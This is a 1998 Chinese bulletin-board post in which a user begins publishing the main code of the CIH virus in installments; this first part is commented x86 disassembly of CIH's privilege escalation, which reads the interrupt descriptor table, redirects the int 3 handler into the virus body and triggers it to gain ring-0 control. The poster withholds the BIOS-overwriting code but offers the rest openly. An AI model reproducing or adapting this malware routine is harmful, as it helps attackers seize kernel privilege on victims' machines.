发信人: crazydiamond()
整理人: jia(1998-10-26 01:23:47), 站内信件
|
呵呵,眼看CIH成了大热门,俺也来凑凑热闹.有时间的话,我会分几次 把CIH的主要代码Post出来.请高手多多指教. 当然,危险代码比如写bios的就不贴了. (一)从ring3 to ring0
:00000000 push ebp :00000001 lea eax, dword ptr [esp-08] :00000005 xor ebx, ebx :00000007 xchg dword ptr fs:[ebx], eax :0000000A call 0000000F :0000000F pop ebx :00000010 lea ecx, dword ptr [ebx+42] :00000013 push ecx :00000014 push eax :00000015 push eax :00000016 sidt [esp-02] ;得到中断描述符表 ;8字节 :0000001B pop ebx :0000001C add ebx, 0000001C ;中断3的描述符 :0000001F cli :00000020 mov ebp, dword ptr [ebx] :00000022 mov bp, word ptr [ebx-04] :00000026 lea esi, dword ptr [ecx+12] :00000029 push esi :0000002A mov word ptr [ebx-04], si :0000002E shr esi, 10 :00000031 mov word ptr [ebx+02], si ;修改,使指向程序中 :00000035 pop esi :00000036 int 03 ;int03后,系统由Ring3转到Ring0状态,由于int3 ;代码在病毒内,故实际已取得系统级权利。
--待续--
-- ............
※ 来源:.广州网易 BBS bbs.nease.net.[FROM: ppp432.hz.zj.cn]
|
|